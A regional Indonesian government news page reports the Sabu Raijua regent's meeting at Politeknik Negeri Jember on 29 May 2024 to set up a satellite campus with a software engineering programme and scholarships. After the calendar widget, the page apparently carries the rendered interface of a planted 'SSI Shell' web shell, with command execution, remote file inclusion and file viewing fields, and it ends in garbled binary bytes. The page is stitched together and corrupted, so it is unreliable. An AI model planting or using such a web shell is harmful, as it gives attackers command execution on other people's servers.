INFO

    Pendidikan Tinggi di Sabu Raijua Segera Hadir

    Rabu, 29 Mei 2024

     

    PROKOPIM, Pada Hari Rabu, 29 Mei 2024, Bupati Sabu Raijua, Drs. Nikodemus N. Rihi Heke, M. Si. didampingi oleh Asisten Pemerintahan dan Kesejahteraan Rakyat (Ir. Titus Bernadus Duri), Plt. Kepala Bagian Kejahteraan Rakyat dan juga sebagai Asisten Perekonomian dan Pembangunan (Ir. Mansi Raymond Kore), Kepala Bagian Administrasi Pemerintahan Umum (Robinson Agorius Banfatin, S. STP, MA) menghadiri Rapat Unggah Dokumen dalam rangka pendirian Kampus Program Study Diluar Kampus Utama (PSDKU) di Aula Politeknik Negeri Jember, Provinsi Jawa Timur. Dokumen tersebut dinyatakan telah lengkap dan langsung diunggah ke Aplikasi Siskema pada Kementerian Riset dan Pendidikan Tinggi sebagai persyaratan untuk memperoleh Izin Penyelenggaraan PSDKU di Kabupaten Sabu Raijua di Provinsi Nusa Tenggara Timur.

     

    Dengan demikian maka semua persyaratan telah dipenuhi baik oleh Pemda Sabu Raijua, Politeknik Negeri Jember, Lembaga Layanan Pendidikan Tinggi (LL DIKTI) Provinsi Nusa Tenggara Timur, Politeknik Negeri Kupang dan selanjutnya pada hari Jumat 31 Mei 2024 akan dilanjutkan dengan Pertemuan Penyampaian Pernyataan Komitmen Pemerintah Daerah bersama DPRD kepada Kementerian Riset dan Pendidikan Tinggi melalui Direktorat Jenderal Pendidikan Vokasi di Jakarta, dalam menindaklanjuti Nota Kesepahaman Bersama (MOU) antara Pemerintah Kabupaten Sabu Raijua dengan Politeknik Negeri Jember. Untuk semester ganjil 2024 direncanakan akan dibuka 1 Jurusan dengan Akreditasi A sebagai perintis yaitu Jurusan Teknologi Rekayasa Perangkat Lunak (Jenjang D-4/S-1) dengan jumlah Mahasiswa sebanyak 60 orang.

    Diharapkan para Lulusan SMA/SMK yg tidak dapat melanjutkan Kuliah ke Luar Daerah, dapat mengikuti perkuliahan di Sabu Raijua terutama anak-anak yg berasal dari Keluarga Kurang Mampu karena Pemda akan menyediakan Beasiswa bersyarat. Turut hadir pada rapat tersebut yaitu Direktur Politeknik Negeri Jember (Ir. Syaiful Anwar, M. Si), Wakil Direktur 1 ( Dr. Ir. Suratno, M. Kom), Wakil Direktur 3, (Prof. Dr. Wahyu), Ketua dan Sekretaris Jurusan Teknologi Rekayasa Perangkat Lunak, Ketua Tim Ahli  percepatan PSDKU SABU RAIJUA (Prof. Dr. Suwardi, M. Si), Kepala Bagian Kerja Sama (Agus Aryanto Wibowo, SE, M. Si), Kegiatan diakhiri dengan Penggunggahan Point ke-8 yaitu Nama Tenaga Dosen dan Non Kependidikan (Admin, Teknisi) oleh Bupati Sabu Raijua. Helama Tona IE.

     


    Simpan sebagai :

    Berita terkait :

    «

    Juni 2024

    »
    MggSenSelRabKamJumSab
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30


    SSI Shell


    Shell info

    GMT date:   
    Local date:   
    Document name:   
    Document URI:   
    Last modified:   
    Owner:   


    Server info

    
    


    Command for shell & address for inclusion

    Enter command/address:    

    Shell

    Executed command:   


    Operations on files

    View file (cat):   
    Included file:   


    (c) :V ( :3 )
    2009, v1.02
    ONLY FOR EDUCATIONAL PURPOSES. ILLEGAL ACTIVITIES PROHIBITED.
    |þ»$}HÒ«ašÖ¦Ì/dà—øøYü>,éF?Ü FËtôÂ*~ÿ®¶tÂÃA©>>‡o\è™'¬ç÷Ê